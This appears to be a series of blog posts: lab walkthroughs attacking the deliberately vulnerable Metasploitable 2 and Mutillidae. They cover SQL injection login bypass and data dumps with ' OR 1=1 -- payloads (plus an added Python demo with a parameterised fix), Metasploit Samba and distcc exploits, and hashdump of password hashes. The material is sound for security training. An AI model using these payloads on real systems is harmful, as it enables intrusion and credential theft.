<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Break down:</span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The first apostrophe ( ' ) makes the username input blank. The statement is currently false.</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">But the "OR" operator tells the statement that if anything after it is true, then the whole query becomes true. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">"1=1" is a true condition, just like 2 = 2 or 100 = 100. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The "--" tells the statement to ignore everything after it. </span></li>
</ul>
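As an added example serving both this Extract Data post and the Bypass Authentication post above (not part of the original posts and not Mutillidae's own code), the following Python script reproduces the user-info/login query in SQLite against a constructed three-row accounts table. It shows why the tautology returns every row and lands a naive login on the first record, how the "AND username = 'john'" variant narrows it to one chosen user, and how the same inputs are compared as plain values by a parameterised query. The sample accounts, passwords and function names are assumptions.

```python
import sqlite3

# Constructed sample rows; the lab's real accounts table has 16 rows and
# different passwords. These values are made up for the example.
SAMPLE_ACCOUNTS = [("admin", "pw-admin"), ("adrian", "pw-adrian"), ("john", "pw-john")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return con


def find_vulnerable(con, username, password):
    # The query the error table reveals, built by concatenation: the user's quote
    # closes the literal and the rest of the input becomes part of the WHERE clause.
    sql = "SELECT * FROM accounts WHERE username='%s' AND password='%s'" % (username, password)
    return con.execute(sql).fetchall()


def find_safe(con, username, password):
    # Same query, parameterised: the input is compared as a value, never parsed as SQL.
    return con.execute("SELECT * FROM accounts WHERE username=? AND password=?",
                       (username, password)).fetchall()


def login(rows):
    # A naive login handler takes the first matching row, which is why the
    # tautology logs in as the first record (admin) rather than a chosen user.
    return rows[0][0] if rows else None


TAUTOLOGY = "' OR 1=1 -- "                            # makes WHERE true for every row
TARGETED = "' OR (1=1 AND username = 'john') -- "     # true only for the john row


def demo():
    con = make_db()
    return {
        # Every row comes back: the WHERE clause is true for all of them.
        "rows_dumped": len(find_vulnerable(con, TAUTOLOGY, "")),
        "login_tautology": login(find_vulnerable(con, TAUTOLOGY, "")),
        "login_targeted": login(find_vulnerable(con, TARGETED, "")),
        # Parameterised: no account literally named "' OR 1=1 -- " exists.
        "safe_tautology": login(find_safe(con, TAUTOLOGY, "")),
        "safe_targeted": login(find_safe(con, TARGETED, "")),
        "safe_real": login(find_safe(con, "john", "pw-john")),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "=", value)
```

Two practitioner notes: SQLite accepts `--` without a trailing space, whereas MySQL requires the space after `--` that the Bypass Authentication post warns about; and the maxlength attribute that post edits in the browser is a client-side limit only, so server-side code must never rely on it to bound what it receives.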
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">So our favorable query would look like:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username= ' OR 1=1 -- </span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;"><i>TRUE statement</i></span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">On the name field, input: ' OR 1=1 -- </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Do you notice anything below the form? :)</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-6n6dNqim8Zg/WADgkmgmI4I/AAAAAAAACss/FrCBs2rx63Q69POQaR5tRAyQo1pNOaoqgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://2.bp.blogspot.com/-6n6dNqim8Zg/WADgkmgmI4I/AAAAAAAACss/FrCBs2rx63Q69POQaR5tRAyQo1pNOaoqgCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">It is important to be familiar with the SQL syntax. <a href="https://www.tutorialspoint.com/sql/index.htm" target="_blank">tutorialspoint</a> is a great resource for quickly getting on your feet with SQL. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">You can measure your SQL skills by answering this question - Why did it show us all of the username and passwords? Why not a couple of them or just one of them?</span><br />
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-51493206143149159912016-10-14T02:43:00.001-07:002016-10-14T02:43:41.497-07:00Metasploitable 2 & Mutillidae 2.1.19: Correcting Database Errors<span style="font-family: Trebuchet MS, sans-serif;">Metasploitable 2 comes with <a href="https://sourceforge.net/projects/mutillidae/" target="_blank">Mutillidae 2.1.19</a> preinstalled. Mutillidae is a free web application penetration testing practice application. </span><div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">However, when you try to practice your attacks on Mutillidae, you will be greeted with database errors. </span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">Here's how to fix the database.</span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;">Login to your metasploitable 2 machine</span></div>
<div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: cd /var/www/mutillidae</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Then enter the command: sudo nano config.inc</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-unJ_XG1vjZM/WACobW48n8I/AAAAAAAACsM/DqRK1QDHxLsfMdQExlhfVQes34ZHIgo5QCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://2.bp.blogspot.com/-unJ_XG1vjZM/WACobW48n8I/AAAAAAAACsM/DqRK1QDHxLsfMdQExlhfVQes34ZHIgo5QCEw/s400/1.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">You should then see the following on your screen</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-dOQw9xhbspo/WACobRAhs9I/AAAAAAAACsQ/WJordhUczIQ1TJKSyTcql3sGpvscIyx3QCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://4.bp.blogspot.com/-dOQw9xhbspo/WACobRAhs9I/AAAAAAAACsQ/WJordhUczIQ1TJKSyTcql3sGpvscIyx3QCEw/s400/2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">move your cursor using your keyboard's arrow keys and change the dbname to "owasp10" as shown below</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-9ufNtdrwZc4/WACobTPc50I/AAAAAAAACsU/ZWw5A5nPpNM3kg66UyXCBt1AsXxjCCHswCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="https://2.bp.blogspot.com/-9ufNtdrwZc4/WACobTPc50I/AAAAAAAACsU/ZWw5A5nPpNM3kg66UyXCBt1AsXxjCCHswCEw/s400/3.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">now hit "ctrl+x", then "Y" to confirm save changes and then "enter".</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">Once your back on the console, enter the command: sudo /etc/init.d/apache2 reload</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CwK5JUNFf68/WACob_L38AI/AAAAAAAACsY/5-5jSzZa46w1KLOUZhquS-5sYgOOZM08gCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="16" src="https://4.bp.blogspot.com/-CwK5JUNFf68/WACob_L38AI/AAAAAAAACsY/5-5jSzZa46w1KLOUZhquS-5sYgOOZM08gCEw/s400/4.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">On your kali machine, enter the address <<metasploitable 2's machines IP address>>/mutillidae</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-T08-zvN_S9o/WACob5wwXsI/AAAAAAAACsc/BIGX1FaokToeSiWKa8RHYR-lPfaYj5XMACEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://4.bp.blogspot.com/-T08-zvN_S9o/WACob5wwXsI/AAAAAAAACsc/BIGX1FaokToeSiWKa8RHYR-lPfaYj5XMACEw/s400/5.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">And click on "Reset DB" and you are good to go. </span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-74172049675601581582016-10-13T02:23:00.000-07:002016-10-13T02:23:26.588-07:00Pwning Metasploitable 2: Post Exploitation - Dumping Password Hashes<span style="font-family: Trebuchet MS, sans-serif;">In the previous exploitation articles we opened sessions on our target machine. An open session lets you act on the target with whatever privileges the exploited service had, given the right tools. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Ill have to admit- we have been skipping a few details during exploitation. While using the exploits, we can also set <a href="https://www.offensive-security.com/metasploit-unleashed/payloads/" target="_blank">payloads</a>. Think of payloads as an extra set of tools that you go in with that will help you do more stuff. We will show you how to use payloads in later articles.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.pentest-standard.org/index.php/Post_Exploitation" target="_blank">Post exploitation</a> is the next step after breaking into the target machine. Lets look at a post exploitation example where we will dump all the password hashes of users on the target system. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Get an open session </span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Follow any of our previous exploitation articles to help you get an open session with the target machine. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Post exploitation </span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Hit ctrl+Z to put the session into background. Enter Y when prompted. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-0xTG45xevtw/V_9IvK_LOqI/AAAAAAAACsA/UxLy_tvzdLAPMmt48sd0BtuKRKTfliTlACEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="33" src="https://3.bp.blogspot.com/-0xTG45xevtw/V_9IvK_LOqI/AAAAAAAACsA/UxLy_tvzdLAPMmt48sd0BtuKRKTfliTlACEw/s400/6.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">With this command, the session is still open however it is put on the background so as to allow you to use msfconsole. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You can have multiple open sessions in the background. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Check your sessions using the command: sessions</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-snyjo5Qh4z0/V_9IvIWbyII/AAAAAAAACsA/-8UKbo5H8zQCYQTonPr2pt_a-03GxVm2wCEw/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="102" src="https://2.bp.blogspot.com/-snyjo5Qh4z0/V_9IvIWbyII/AAAAAAAACsA/-8UKbo5H8zQCYQTonPr2pt_a-03GxVm2wCEw/s400/7.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use post/linux/gather/hashdump</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: show options</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">This command selects the hashdump script. Metasploit stores all its post exploitation scripts in the "post" folder. We will go through other scripts in later articles. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-VLYIB5th9tU/V_9IvSTXQsI/AAAAAAAACsA/4c2MAgw2n64EQWnCz8zfB61sx1ww3nbcwCEw/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="101" src="https://2.bp.blogspot.com/-VLYIB5th9tU/V_9IvSTXQsI/AAAAAAAACsA/4c2MAgw2n64EQWnCz8zfB61sx1ww3nbcwCEw/s400/8.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Normally we set the RHOST on exploits to give them a target. However on post exploitation scripts in metasploit we give it a session. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set SESSION 1</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The "1" in the command simple corresponds to the 'session 'id' you want the script to run on. You can view your sessions by the "sessions" command shown above. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rrPKt-nAPow/V_9IvcO0scI/AAAAAAAACsA/TQQ4FCEOknE0sisIT6oALcGp0-Q4Z91WQCEw/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="38" src="https://2.bp.blogspot.com/-rrPKt-nAPow/V_9IvcO0scI/AAAAAAAACsA/TQQ4FCEOknE0sisIT6oALcGp0-Q4Z91WQCEw/s400/9.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">...and exploit. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-JCAnwTru8X8/V_9IuH2ST1I/AAAAAAAACsA/ZLiQxqGh2cQUjFozchVwZf3qkfe1XFRwwCEw/s1600/10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="170" src="https://2.bp.blogspot.com/-JCAnwTru8X8/V_9IuH2ST1I/AAAAAAAACsA/ZLiQxqGh2cQUjFozchVwZf3qkfe1XFRwwCEw/s400/10.PNG" width="400" /></span></a></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">What you see on your screen are passwords... in <a href="https://en.wikipedia.org/wiki/Cryptographic_hash_function" target="_blank">hash</a> format. Hashed passwords are then cracked using password cracking techniques or tools to retrieve plain text passwords which we can then use on login fields. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-45959116719862262192016-10-13T01:43:00.000-07:002016-10-13T01:43:54.300-07:00Pwning Metasploitable 2: Exploiting Samba smbd 3.X <span style="font-family: Trebuchet MS, sans-serif;">Lets look at port 139 on our <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2 machine</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Discovering the port status and service</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: nmap -sV -p 139 <<target IP address>></span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-tQl4CEkQugs/V_9It_QhVMI/AAAAAAAACrY/ccFRnfeXY9MawedjUK3oakf2C6AYNLAvACEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://4.bp.blogspot.com/-tQl4CEkQugs/V_9It_QhVMI/AAAAAAAACrY/ccFRnfeXY9MawedjUK3oakf2C6AYNLAvACEw/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">From the nmap results, we see that the port is open with Samba 3.X running on it. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><a href="https://www.samba.org/" target="_blank">Samba</a> is a freeware that allows users to access and read files, access printers and other resources over the network. It is based on the <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa365233(v=vs.85).aspx" target="_blank">Server Message Block (SMB) protocol</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Exploiting Samba</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Start up your Metasploit framework using the command "msfconsole"</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Search for Samba exploits with: search samba</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5vqlP3iaJIQ/V_9IuBQGPRI/AAAAAAAACrg/P_gEwrpMO_gTKB9nxZ7En5Cabtr0hrlxQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://4.bp.blogspot.com/-5vqlP3iaJIQ/V_9IuBQGPRI/AAAAAAAACrg/P_gEwrpMO_gTKB9nxZ7En5Cabtr0hrlxQCEw/s400/2.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">There are many exploits for samba. <a href="https://www.samba.org/samba/security/CVE-2007-2447.html" target="_blank">Only 1 fits our needs</a>. You can try out different exploits and see the results. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use exploit/multi/samba/usermap_script</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: show options</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-oSKKiJWbXnI/V_9IupPjQWI/AAAAAAAACro/NW_NnbbvTf4H6OPmt7VI1EhISezb5ecjgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://4.bp.blogspot.com/-oSKKiJWbXnI/V_9IupPjQWI/AAAAAAAACro/NW_NnbbvTf4H6OPmt7VI1EhISezb5ecjgCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">RHOST field is empty. Lets give it the exploit a target.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set RHOST <<target IP address>></span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-u3TACCzXpSo/V_9IuseDHPI/AAAAAAAACrk/vsoTEYArqpscFJL1mIzoEKLnG_vhWBK4QCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://3.bp.blogspot.com/-u3TACCzXpSo/V_9IuseDHPI/AAAAAAAACrk/vsoTEYArqpscFJL1mIzoEKLnG_vhWBK4QCEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">and lastly, enter the command: exploit</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Rq9vUpWFcUQ/V_9Iu65hMCI/AAAAAAAACrs/PDpQHtzXvcMFEXegGUzVdm8GoA_9NvAVACEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://2.bp.blogspot.com/-Rq9vUpWFcUQ/V_9Iu65hMCI/AAAAAAAACrs/PDpQHtzXvcMFEXegGUzVdm8GoA_9NvAVACEw/s400/5.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Exploited successfully. We have our shell :)</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<br />
<span style="font-family: Trebuchet MS, sans-serif;">Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation. The next step after getting a shell. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>) </span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-65358384136346337542016-10-12T02:36:00.001-07:002016-10-12T03:23:58.152-07:00Pwning Metasploitable 2: Exploiting distcc v1 (GNU) 4.2.4<span style="font-family: "trebuchet ms" , sans-serif;">Lets look at port 3632.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> is running <a href="https://github.com/distcc/distcc" target="_blank">distcc</a>. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">distcc is a program that is used to distribute compilation of code across machines on a network taking advantage of unused processing power of other computers. Machines on the network need to have distccd daemon and compatible compiler installed. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scanning port 3632</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 3632 <<target IP address>></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5B-Vx3slMHc/V_3_lRUZwAI/AAAAAAAACqw/9wM3_AAMTP832ZiFrfrSWtBufr3C-3xZwCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://4.bp.blogspot.com/-5B-Vx3slMHc/V_3_lRUZwAI/AAAAAAAACqw/9wM3_AAMTP832ZiFrfrSWtBufr3C-3xZwCLcB/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">Nmap scan shows that distccd v1 is running on port 3632.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Searching for exploit in msfconsole</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Start up your msfconsole and search for a distcc exploit. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: search distcc</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-273cQgxnkkA/V_3_liFAwhI/AAAAAAAACrA/N2VmOv3WPbgPMsmT_ZPXQ28SVg6DSY7XQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://3.bp.blogspot.com/-273cQgxnkkA/V_3_liFAwhI/AAAAAAAACrA/N2VmOv3WPbgPMsmT_ZPXQ28SVg6DSY7XQCEw/s320/2.PNG" width="320" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">There is an <a href="https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec" target="_blank">exploit available for distcc</a>. More references <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687" target="_blank">here</a> and <a href="https://www.exploit-db.com/exploits/9915/" target="_blank">here</a>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Exploiting distcc using distcc_exec exploit</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Lets use the exploit by giving the command: use exploit/unix/misc/distcc_exec</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-nCK4bnBPVHQ/V_3_lugQrSI/AAAAAAAACrA/ToXHNNQEPAE05zNz_PE9YfRY5lUFc-M_gCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://4.bp.blogspot.com/-nCK4bnBPVHQ/V_3_lugQrSI/AAAAAAAACrA/ToXHNNQEPAE05zNz_PE9YfRY5lUFc-M_gCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
